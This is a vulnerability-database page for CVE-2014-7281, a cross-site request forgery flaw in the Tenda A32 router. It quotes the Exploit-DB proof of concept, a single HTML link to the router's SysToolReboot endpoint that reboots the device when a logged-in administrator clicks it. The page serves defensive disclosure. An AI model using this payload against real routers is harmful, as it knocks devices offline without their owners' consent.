CVE-2014-7281
Description
Cross-site request forgery (CSRF) vulnerability in Shenzhen Tenda Technology Tenda A32 Router with firmware 5.07.53_CN allows remote attackers to hijack the authentication of administrators for requests that reboot the device via a request to goform/SysToolReboot.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Tenda A32 Router - Cross-Site Request Forgery
# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)
# CVE ID :CVE-2014-7281
# Date: 2014-10-10
# Exploit Author: zixian
# Vendor Homepage: http://tenda.com.cn/
# Software Link: http://tenda.com.cn/Catalog/Product/325
# Version: V5.07.53_CN
When the administrator login, click on the link below, the device will reboot。
<a href="http://192.168.2.1/goform/SysToolReboot">reboot</a>References
- http://osvdb.org/show/osvdb/113308
- http://packetstormsecurity.com/files/128671/Tenda-A32-Cross-Site-Request-Forgery.html
- http://www.exploit-db.com/exploits/34969
- http://osvdb.org/show/osvdb/113308
- http://packetstormsecurity.com/files/128671/Tenda-A32-Cross-Site-Request-Forgery.html
- http://www.exploit-db.com/exploits/34969
CWEs
CWE-352
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.